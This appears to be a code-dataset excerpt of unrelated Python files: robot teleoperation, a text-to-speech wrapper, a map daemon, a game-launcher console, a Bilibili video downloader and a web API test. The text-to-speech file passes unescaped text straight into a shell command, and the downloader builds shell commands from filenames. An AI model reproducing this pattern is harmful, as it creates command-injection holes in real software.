source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
teleop_pr2.py
|
#!/usr/bin/env python
from __future__ import print_function
import select
import sys
import termios
import tty
from pb_planning.pybullet_tools.pr2_utils import PR2_GROUPS, DRAKE_PR2_URDF
from pb_planning.pybullet_tools import add_data_path, connect, enable_gravity, load_model, \
joints_from_names, load_pybullet, \
velocity_control_joints, disconnect, enable_real_time, HideOutput
HELP_MSG = """
Reading from the keyboard and Publishing to Twist!
---------------------------
Moving around:
u i o
j k l
m , .
For Holonomic mode (strafing), hold down the shift key:
---------------------------
U I O
J K L
M < >
t : up (+z)
b : down (-z)
anything else : stop
q/z : increase/decrease max speeds by 10%
w/x : increase/decrease only linear speed by 10%
e/c : increase/decrease only angular speed by 10%
CTRL-C to quit
"""
MOVE_BINDINGS = {
'i': (1, 0, 0, 0),
'o': (1, 0, 0, -1),
'j': (0, 0, 0, 1),
'l': (0, 0, 0, -1),
'u': (1, 0, 0, 1),
',': (-1, 0, 0, 0),
'.': (-1, 0, 0, 1),
'm': (-1, 0, 0, -1),
'O': (1, -1, 0, 0),
'I': (1, 0, 0, 0),
'J': (0, 1, 0, 0),
'L': (0, -1, 0, 0),
'U': (1, 1, 0, 0),
'<': (-1, 0, 0, 0),
'>': (-1, -1, 0, 0),
'M': (-1, 1, 0, 0),
't': (0, 0, 1, 0),
'b': (0, 0, -1, 0),
}
SPEED_BINDINGS = {
'q': (1.1, 1.1),
'z': (.9, .9),
'w': (1.1, 1),
'x': (.9, 1),
'e': (1, 1.1),
'c': (1, .9),
}
ESCAPE = '\x03'
#####################################
def get_key(settings):
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
def print_velocities(speed, turn):
print("Speed: {} | Turn: {} ".format(speed, turn))
#####################################
def run_simulate(pr2):
joints = joints_from_names(pr2, PR2_GROUPS['base'])
dx = dy = dz = dth = 1
speed, turn = 0.5, 1.0
while True:
velocities = [dx * speed, dy * speed, dth * turn]
velocity_control_joints(pr2, joints, velocities)
def run_thread(pr2):
joints = joints_from_names(pr2, PR2_GROUPS['base'])
dx = dy = dz = dth = 0
speed, turn = 0.5, 1.0
settings = termios.tcgetattr(sys.stdin)
try:
print(HELP_MSG)
print_velocities(speed, turn)
while True: # TODO: getKeyboardEvents
key = get_key(settings) # Waits until a key is read
if key in MOVE_BINDINGS:
dx, dy, dz, dth = MOVE_BINDINGS[key]
elif key in SPEED_BINDINGS:
mspeed, mturn = SPEED_BINDINGS[key]
speed *= mspeed
turn *= mturn
print_velocities(speed, turn)
else: # When it receives another key
dx = dy = dz = dth = 0
if key == ESCAPE:
break
# twist.linear.dz = dz * speed
velocities = [dx * speed, dy * speed, dth * turn]
velocity_control_joints(pr2, joints, velocities)
except Exception as e:
print(e)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
#####################################
def main():
# https://github.com/ros-teleop/teleop_twist_keyboard
# http://openrave.org/docs/latest_stable/_modules/openravepy/misc/#SetViewerUserThread
connect(use_gui=True)
add_data_path()
load_pybullet("plane.urdf")
#load_pybullet("models/table_collision/table.urdf")
with HideOutput():
pr2 = load_model(DRAKE_PR2_URDF, fixed_base=True)
enable_gravity()
enable_real_time() # TODO: won't work as well on OS X due to simulation thread
#run_simulate(pr2)
run_thread(pr2)
# TODO: keep working on this
#userthread = threading.Thread(target=run_thread, args=[pr2])
#userthread.start()
#userthread.join()
disconnect()
if __name__=="__main__":
main()
|
tts.py
|
import os
from threading import Thread
music_level = 30
class TTS():
def __init__(self, frontend, config):
self.frontend = frontend
def speak_text(self, text):
t = Thread(target=self.speak_text_thread, args=(text,))
t.start()
def speak_text_thread(self, text):
os.system(' echo "' + text + '" | festival --tts')
|
mapd.py
|
#!/usr/bin/env python
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
from scipy import spatial
except ImportError as e:
import os
import sys
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
from selfdrive.mapd import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from selfdrive.services import service_list
import selfdrive.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
def query_thread():
global last_query_result, last_query_pos, cache_valid
api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 1000: #updated when we are 1km from the edge of the downloaded circle
continue
if dist > 3000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=3000)
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def mapsd_thread():
global last_gps
context = zmq.Context()
gps_sock = messaging.sub_sock(context, service_list['gpsLocation'].port, conflate=True)
gps_external_sock = messaging.sub_sock(context, service_list['gpsLocationExternal'].port, conflate=True)
map_data_sock = messaging.pub_sock(context, service_list['liveMapData'].port)
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
while True:
gps = messaging.recv_one(gps_sock)
gps_ext = messaging.recv_one_or_none(gps_external_sock)
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
gps = gps.gpsLocation
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Seed limit
max_speed = cur_way.max_speed()
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
# TODO: use the function below to anticipate upcoming speed limits
#max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
#if max_speed_ahead is not None and max_speed_ahead_dist is not None:
# dat.liveMapData.speedLimitAheadValid = True
# dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
# dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
advisory_max_speed = cur_way.advisory_max_speed()
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
LauncherCommand.py
|
from command import *
import threading
import re
from enum import Enum, auto
# TODO: move CMDCode to another file and import it here
class CMDCode(Enum):
EXT = auto()
FIND_MATCH = auto()
CANCEL = auto()
ACCEPT = auto()
DECLINE = auto()
SAVE = auto()
AL_BANS = auto()
EN_BANS = auto()
HOVER = auto()
GET_HOVER = auto()
AL_PICKS = auto()
EN_PICKS = auto()
MY_POS = auto()
COMPLETE = auto()
INIT_STATE = auto()
DEINIT_STATE = auto()
SEND_MESSAGES = auto()
class LauncherCommand:
'''Defines what function match witch command.'''
CMD = {
CMDCode.EXT: ['exit'],
CMDCode.FIND_MATCH: ['findmatch', 'fm'],
CMDCode.CANCEL: ['cancel', 'c', 'd'],
CMDCode.ACCEPT: ['accept', 'acc', 'ok'],
CMDCode.DECLINE: ['decline', 'c', 'd'],
CMDCode.SAVE: ['save', 's'],
CMDCode.AL_BANS: ['getAllyBans', 'alb'],
CMDCode.EN_BANS: ['getEnemyBans', 'enb'],
CMDCode.HOVER: ['hover', 'h'],
CMDCode.GET_HOVER: ['getHover', 'H'],
CMDCode.AL_PICKS: ['getAllyPicks', 'gap'],
CMDCode.EN_PICKS: ['getEnemyPicks', 'gep'],
CMDCode.MY_POS: ['getMyPosition', 'gmp'],
CMDCode.COMPLETE: ['complete', 'ok'],
CMDCode.INIT_STATE: ['start', 'st', 'init'],
CMDCode.DEINIT_STATE: ['stop', 'terminate', 'term', 'deinit'],
CMDCode.SEND_MESSAGES: ['send', 'M', 'message']
}
user_accounts: Dict[str, str] = {}
def __init__(self):
self.command: Command = None
@classmethod
def set_command(cls, command: Command):
if isinstance(command, Command):
cls.command = command
@classmethod
def update_user_accounts(cls, new_account: Dict[str, str]):
cls.user_accounts.update(new_account)
@classmethod
def execute_command(cls):
try:
cls.command.execute()
except Exception as e:
print(Command.ERR_S, e, sep=' ')
@classmethod
def find_match(cls):
cls.set_command(MatchFinder())
cls.execute_command()
@classmethod
def cancel(cls):
cls.set_command(Canceller())
cls.execute_command()
@classmethod
def accept(cls):
cls.set_command(Acceptor())
cls.execute_command()
@classmethod
def decline(cls):
cls.set_command(Decliner())
cls.execute_command()
@classmethod
def save_to_file(cls, what, filename):
cls.set_command(
WS_JSONSaver(
spinner=what,
textinput=filename
)
)
cls.execute_command()
@classmethod
def get_ally_bans(cls):
cls.set_command(AllyBansGetter())
cls.execute_command()
@classmethod
def get_enemy_bans(cls):
cls.set_command(EnemyBansGetter())
cls.execute_command()
@classmethod
def hover(cls, arg):
cls.set_command(Hover(champion=arg))
cls.execute_command()
@classmethod
def get_hover(cls):
cls.set_command(HoverGetter())
cls.execute_command()
@classmethod
def get_my_team_champs(cls):
cls.set_command(MyTeamChampsGetter())
cls.execute_command()
@classmethod
def get_enemy_team_champs(cls):
cls.set_command(EnemyTeamChampsGetter())
cls.execute_command()
@classmethod
def get_my_position(cls):
cls.set_command(MyPositionGetter())
cls.execute_command()
@classmethod
def complete(cls):
cls.set_command(Complete())
cls.execute_command()
@classmethod
def init(cls):
cls.set_command(InitState())
cls.execute_command()
@classmethod
def deinit(cls):
cls.set_command(DeinitState())
cls.execute_command()
@classmethod
def default_action(cls):
print(Command.INFO_S,
'For this button an action has not been set yet.',
sep=' ')
@classmethod
def send_messages(cls, event_type: str):
# just for testing purposes
cls.set_command(MessagesSender(user_accounts=cls.user_accounts, event_type=event_type))
cls.execute_command()
def start(self):
regex = r'\w+'
while True:
_input = input('$>')
matches = re.findall(regex, _input)
_cmd = matches[0] # command string
if _cmd in self.CMD[CMDCode.EXT]:
break
elif _cmd in self.CMD[CMDCode.FIND_MATCH]:
LauncherCommand.find_match()
elif _cmd in self.CMD[CMDCode.CANCEL]:
LauncherCommand.cancel()
elif _cmd in self.CMD[CMDCode.SAVE]:
try:
LauncherCommand.save_to_file(what=matches[1],
filename=matches[2])
except IndexError:
print(Command.ERR_S, 'provide an argument')
elif _cmd in self.CMD[CMDCode.AL_BANS]:
LauncherCommand.get_ally_bans()
elif _cmd in self.CMD[CMDCode.EN_BANS]:
LauncherCommand.get_enemy_bans()
elif _cmd in self.CMD[CMDCode.HOVER]:
try:
LauncherCommand.hover(matches[1])
except IndexError:
print(Command.ERR_S, 'provide an argument')
elif _cmd in self.CMD[CMDCode.GET_HOVER]:
LauncherCommand.get_hover()
elif _cmd in self.CMD[CMDCode.AL_PICKS]:
LauncherCommand.get_my_team_champs()
elif _cmd in self.CMD[CMDCode.EN_PICKS]:
LauncherCommand.get_enemy_team_champs()
elif _cmd in self.CMD[CMDCode.MY_POS]:
LauncherCommand.get_my_position()
elif _cmd in self.CMD[CMDCode.COMPLETE]:
LauncherCommand.complete()
elif _cmd in self.CMD[CMDCode.INIT_STATE]:
LauncherCommand.init()
elif _cmd in self.CMD[CMDCode.DEINIT_STATE]:
LauncherCommand.deinit()
elif _cmd in self.CMD[CMDCode.SEND_MESSAGES]:
try:
LauncherCommand.send_messages(matches[1])
except IndexError:
print(Command.ERR_S, 'provide an argument')
else:
LauncherCommand.default_action()
# class ConsoleController:
# '''This class is to provide method which starts ifinite loop
# which reads input from the user and runs relevant method of
# LaucherCommand class instance.'''
# def __init__(self):
# self.command: LauncherCommand = LauncherCommand()
# def start(self):
# while True:
# _input = input('$>')
# if _input == 'exit':
# break
# if _input == 'findmatch':
# self.command.find_match()
# # old code, not relevant
# if __name__ == '__main__':
# import time
# cc = ConsoleController()
# t = threading.Thread(target=cc.start)
# t.daemon = True
# t.start()
# for i in range(10):
# time.sleep(.4)
# print(f'counter: {i}')
|
bilibili3.py
|
import requests
import re
import json
import os
import click
import threading
import shutil
import subprocess
import time
import math
sep = os.sep
# 需要依赖ffmpeg
# 有些资源会限速╭(╯^╰)╮
# 想下载大会员番剧或1080P+请填入大会员cookie到headers
class Bilibili:
def __init__(self, ss, sessData='', savePath: str = 'download', func=None):
self.ss = ss
self.base_url = f"https://www.bilibili.com/bangumi/play/{ss}"
self.headers = {
"Referer": f"https://www.bilibili.com/bangumi/play/{ss}/",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1",
# 登录B站后复制一下cookie中的SESSDATA字段,有效期1个月
'Cookie': 'SESSDATA={}'.format(sessData),
}
savePath = savePath+sep+'番剧'
self._savePath = savePath
self.savePath = savePath + sep + ss + sep
self.func = func
self.func = func
self.total = 0
self.index = 0
self.name = ''
self.tasks = 0
self.taskFile = self.savePath + 'task.txt'
def callback(self, typeName, title=None):
if self.func:
self.func({
'type': 'data',
'name': self.name,
'total': self.total,
'index': self.index,
'title': title,
})
def callback2(self, total, index, title=None):
if index > total:
index = total
if self.func:
self.func({
'type': 'progress',
'name': self.name,
'total': total,
'index': index,
'title': title,
})
def callbackMsg(self, msg, color=None):
if self.func:
self.func({
'type': 'msg',
'msg': msg,
'color': color,
})
def printMsg(self, msg, color=None):
if self.func:
self.callbackMsg(msg, color)
else:
print(msg)
def filterName(self, name):
regexp = re.compile(r'(/|\\|:|\?|\*|\||"|\'|<|>|\$)')
space = re.compile(r'\s{2,}')
return space.sub(" ", regexp.sub("", name))
# 获取cid, bv_id, ep_id, 当前集数
def get_params(self):
rep = requests.get(self.base_url)
name = re.findall(r'"name": "(.+?)",', rep.text)
if not name:
self.printMsg(f'\n{self.ss} 番号解析失败 ××××××××××××××××', color='err')
return []
name = self.filterName(name[0])
config = re.findall(
r'window.__INITIAL_STATE__=({.+?)]};', rep.text, re.S)[0] + ']}'
epList = json.loads(config)['epList']
self.savePath = self._savePath + sep + name + sep
self.taskFile = self.savePath + 'task.txt'
arr = []
for ep in epList:
arr.append({
'name': self.filterName(f'{name} {ep["titleFormat"]} {ep["longTitle"]}'),
'cid': ep['cid'],
'bvid': ep['bvid'],
'epid': ep['id'],
'cover': 'https:' + ep['cover']
})
return arr
def checkDir(self):
try:
os.makedirs(self.savePath + self.ss)
except FileExistsError:
pass
# os.chdir(self.ss)
def rmPiecesDir(self):
try:
shutil.rmtree(self.savePath + self.ss)
os.remove(self.taskFile)
except:
pass
else:
pass
def getFileByUrl(self, url, filename, title):
self.printMsg(f"\n【{title}】 正在下载")
pindex = 0
if os.path.isfile(filename):
fsize = os.path.getsize(filename)
pindex += fsize
repsize = requests.get(url, headers=self.headers, stream=True)
total_size = int(repsize.headers['Content-Length'])
if abs(fsize-total_size) < 500:
self.printMsg('\n【' + filename +
'】 '+' 文件已存在', color='warn')
self.index += 1
self.callback('data', title)
return True
else:
self.headers['Range'] = 'bytes='+str(fsize)+'-'
with requests.get(url, headers=self.headers, stream=True) as rep:
file_size = int(rep.headers['Content-Length'])
if not rep.status_code in [200, 206]:
self.printMsg(f"\n【{title}】 下载失败", color='err')
self.index += 1
self.callback('data')
return False
label = '{:.2f}MB'.format(file_size / (1024 * 1024))
if self.func:
with open(filename, "ab") as f:
for chunk in rep.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
pindex += 1024
self.callback2(file_size, pindex, title=title)
else:
with click.progressbar(length=file_size, label=label) as progressbar:
progressbar.update(pindex)
with open(filename, "ab") as f:
for chunk in rep.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
progressbar.update(1024)
pindex += 1027
if pindex > file_size:
pindex = file_size
self.callback2(file_size, pindex, title=title)
self.printMsg(f"【{title}】 下载成功\n", color='success')
self.printMsg(f"\n 休息一下", color='warn')
self.index += 1
self.callback('data', title=title)
return True
def getVideoFormat(self):
return 'mp4'
def concatContent(self, filename):
content = "file '"+filename+"'\n"
return content
def writeConcatFile(self, content):
with open(self.taskFile, 'w', encoding='utf-8') as f:
f.write(content)
f.close
def videoMerge(self, taskFile, output, title=''):
self.printMsg(f"\n【{title}】 分块视频合并中....................")
self.callback('data', '合并中..')
sentence = 'ffmpeg -loglevel error -f concat -safe 0 -i "{}" -c copy "{}.{}" -y'.format(
taskFile, output, self.getVideoFormat())
child = subprocess.Popen(sentence, shell=True)
child.wait()
self.printMsg(f"\n【{title}】 分块视频合并完成....................")
def combineAV(self, videoFile, audioFile, output, title):
self.printMsg(f"\n【{title}】 音频合并中....................")
self.callback('data', '合并中..')
sentence = 'ffmpeg -loglevel error -i "{}" -i "{}" -c copy "{}.{}" -y'.format(
videoFile, audioFile, output, self.getVideoFormat())
child = subprocess.Popen(sentence, shell=True)
child.wait()
self.printMsg(f"【{title}】 音频合并完成....................")
def downloadPieces(self, data, title=''):
if os.path.isfile(self.savePath +
title + "." + self.getVideoFormat()):
self.printMsg('\n【' + self.savePath +
title + "." + self.getVideoFormat()+' 文件已存在', color='warn')
self.index += len(data['result']['durl'])+1
self.callback('data', title)
self.tasks -= 1
return True
threads = []
filepaths = []
try:
self.checkDir()
task_content = ''
for info in data['result']['durl']:
filename = self.savePath + self.ss + sep + self.ss + '_' + title + \
'_' + str(info['order']) + "." + self.getVideoFormat()
t = threading.Thread(target=self.getFileByUrl, args=(
info['url'], filename, title + ' 分块 ' + str(info['order'])))
threads.append(t)
t.setDaemon(True)
t.start()
filepaths.append(filename)
task_content += self.concatContent(filename)
for t in threads:
t.join()
if task_content != '':
try:
self.writeConcatFile(task_content)
self.videoMerge(self.taskFile, self.savePath +
title, title)
except BaseException as e:
self.printMsg(f"{e}", color='err')
self.index += 1
self.callback('data')
except BaseException:
pass
self.tasks -= 1
for path in filepaths:
os.remove(path)
# self.rmPiecesDir()
pass
def downloadAudioAndVideo(self, text, item):
if os.path.isfile(item["savePath"]):
self.printMsg('\n【' + item["savePath"] +
'】 '+' 文件已存在', color='warn')
self.index += 2
self.callback('data')
self.tasks -= 1
return
video = self.getFileByUrl(
text['result']['dash']['video'][0]['base_url'], item['videoPath'], item['name'] + " 视频部分")
audio = self.getFileByUrl(
text['result']['dash']['audio'][0]['base_url'], item['audioPath'], item['name'] + " 音频部分")
if video and audio:
try:
self.printMsg(f"\n【{item['name']}】 视频+音频 开始合并")
self.callback('data', '合并中..')
child = subprocess.Popen(
f'ffmpeg -loglevel error -i "{item["videoPath"]}" -i "{item["audioPath"]}" -vcodec copy -acodec copy "{item["savePath"]}" -y', shell=True)
child.wait()
self.printMsg(f"【{item['name']}】 视频+音频 合并成功")
except BaseException as e:
self.printMsg(f"【{item['name']}】 {e}", color='err')
pass
try:
os.remove(item['videoPath'])
os.remove(item['audioPath'])
except BaseException:
pass
self.tasks -= 1
self.index += 1
self.callback('data')
# self.rmPiecesDir()
def downCover(self, data, path, title):
self.getFileByUrl(data, path, title)
self.tasks -= 1
def run(self):
eplist = self.get_params()
self.checkDir()
self.total = 1
self.index = 0
self.callback('data', title='拉取数据中.')
data = []
for ep in eplist:
rep = requests.get(f"https://api.bilibili.com/pgc/player/web/playurl?cid={ep['cid']}&qn=112&type=&otype=json&fourk=1&bvid={ep['bvid']}&ep_id={ep['epid']}&fnver=0&fnval=16&session=6665a83430e196a488e4786293452817",
headers=self.headers)
text = json.loads(rep.text)
if text['code'] == 0:
item = {
'title': ep['name'],
'name': ep['name'],
'videoPath': self.savePath + ep['name'] + '_video.mp4',
'audioPath': self.savePath + ep['name'] + '_audio.mp3',
'savePath': self.savePath + ep['name'] + '.mp4',
'data': text
}
if ep['cover']:
self.total += 1
data.append({
'type': '3',
'path': self.savePath + ep['name'] + '.jpg',
'title': ep['name'] + '封面',
'name': ep['name'],
'data': ep['cover']
})
if('dash' in text['result'].keys()):
self.total += 3
data.append({
'type': '1',
'title': ep['name'],
'name': ep['name'],
'videoPath': self.savePath + ep['name'] + '_video.mp4',
'audioPath': self.savePath + ep['name'] + '_audio.mp3',
'savePath': self.savePath + ep['name'] + '.mp4',
'data': text
})
else:
self.total += len(text['result']['durl']) + 1
item['data'] = text
item['type'] = '2'
data.append({
'type': '2',
'title': ep['name'],
'name': ep['name'],
'data': text
})
self.printMsg(
f'{ep["name"]} 数据拉取成功√√√√√√√√√√√√√√√√√√√', color='success')
else:
self.printMsg(
f'{ep["name"]} 数据拉取失败:!!!!{text["message"]}!!!! ××××××××××××××××', color='err')
self.callback('data', title='拉取数据...')
self.printMsg(
f'休息一下', color='warn')
time.sleep(0.1)
self.callback('data', title='开始下载...')
'''
length = len(data)-1
_tasks = []
while length >= 0:
if self.tasks < 5:
item = data[length]
t = None
if item['type'] == '1':
t = threading.Thread(
target=self.downloadAudioAndVideo, args=(item['data'], item))
t.setDaemon(True)
t.start()
_tasks.append(t)
# spawns.append(gevent.spawn(self.downloadAudioAndVideo, item['data'], item['item']))
# self.downloadAudioAndVideo(item['data'], item)
elif item['type'] == '2':
# spawns.append(gevent.spawn(self.downloadPieces,item['data'], item['title']))
# self.downloadPieces(item['data'], item['title'])
t = threading.Thread(target=self.downloadPieces, args=(
item['data'], item['title']))
t.setDaemon(True)
t.start()
_tasks.append(t)
elif item['type'] == '3':
# spawns.append(gevent.spawn(self.getFileByUrl,item['data'], item['path'], item['title']))
# self.getFileByUrl(item['data'], item['path'], item['title'])
t = threading.Thread(target=self.downCover, args=(
item['data'], item['path'], item['title']))
t.setDaemon(True)
t.start()
_tasks.append(t)
self.tasks += 1
length -= 1
else:
time.sleep(0.1)
for t in _tasks:
t.join()
'''
for item in data:
if item['type'] == '1':
# spawns.append(gevent.spawn(self.downloadAudioAndVideo, item['data'], item['item']))
self.downloadAudioAndVideo(item['data'], item)
elif item['type'] == '2':
# spawns.append(gevent.spawn(self.downloadPieces,item['data'], item['title']))
self.downloadPieces(item['data'], item['title'])
elif item['type'] == '3':
# spawns.append(gevent.spawn(self.getFileByUrl,item['data'], item['path'], item['title']))
self.getFileByUrl(item['data'], item['path'], item['title'])
self.rmPiecesDir()
def get(url: str, savepath: str = 'download', func=None, sessData: str = '') -> dict:
bv = re.findall(r'(BV[0-9a-zA-Z]*)', url)
ss = re.findall(r'play/(ss[0-9a-zA-Z]*)', url)
ep = re.findall(r'play/(ep[0-9a-zA-Z]*)', url)
bv = bv or ss or ep
if bv:
bv = bv[0]
tool = Bilibili(bv, sessData,
savepath, func=func)
tool.name = url
tool.run()
else:
self.printMsg('\n解析失败', color='err')
data = {}
data["imgs"] = []
data["videos"] = []
data["m4s"] = []
return data
|
test_api.py
|
# !/usr/bin/env python
# coding=utf-8
import json
import threading
import time
import pymongo
import requests
from app import *
from nose.tools import with_setup
def setup_func():
connection = pymongo.Connection("localhost", 27017)
db = connection.sillynews
db.user.insert({"username": "testUsername",
"password": "testPassword"})
connection.disconnect()
def teardown_func():
connection = pymongo.Connection("localhost", 27017)
connection.drop_database("sillynews")
connection.disconnect()
@with_setup(setup_func, teardown_func)
def test_news_api():
try:
server_thread = threading.Thread(target=run)
server_thread.setDaemon(False)
server_thread.start()
time.sleep(1)
# get the user cookie
r = requests.post("http://127.0.0.1:8888/login/",
data={"username": "testUsername",
"password": "testPassword"}, allow_redirects=False)
user_cookie = r.cookies
# test put
r = requests.put("http://127.0.0.1:8888/api/news/")
assert r.status_code == 403
news = {"title": "test_title",
"author": "test_author",
"date": "test_date",
"body": "test_body",
"column": "test_column"}
r = requests.put("http://127.0.0.1:8888/api/news/",
cookies=user_cookie,
data={"body": json.dumps(news)})
assert r.status_code == 200
# test get
r = requests.get("http://127.0.0.1:8888/api/news/",
params={"title": "test_title"})
news = r.json()
assert news["title"] == "test_title"
assert news["author"] == "test_author"
assert news["body"] == "test_body"
assert news["date"] == "test_date"
assert news["column"] == "test_column"
# test post
change_news = {"title": "test_title",
"author": "change_author",
"date": "change_date",
"body": "change_body",
"column": "change_column"}
r = requests.post("http://127.0.0.1:8888/api/news/",
cookies=user_cookie,
data={"body": json.dumps(change_news)})
assert r.status_code == 200
r = requests.get("http://127.0.0.1:8888/api/news/",
params={"title": "test_title"})
assert r.status_code == 200
assert r.json() == change_news
# test delete
r = requests.delete("http://127.0.0.1:8888/api/news/",
cookies=user_cookie,
params={"title": "test_title"})
assert r.status_code == 200
r = requests.get("http://127.0.0.1:8888/api/news/",
params={"title": "test_title"})
assert r.status_code == 404
# test 404
r = requests.get("http://127.0.0.1:8888/api/news/")
assert r.status_code == 404
r = requests.post("http://127.0.0.1:8888/api/news/",
cookies=user_cookie)
assert r.status_code == 404
r = requests.delete("http://127.0.0.1:8888/api/news/",
cookies=user_cookie)
assert r.status_code == 404
r = requests.put("http://127.0.0.1:8888/api/news/",
cookies=user_cookie)
assert r.status_code == 404
# test column
# test put column
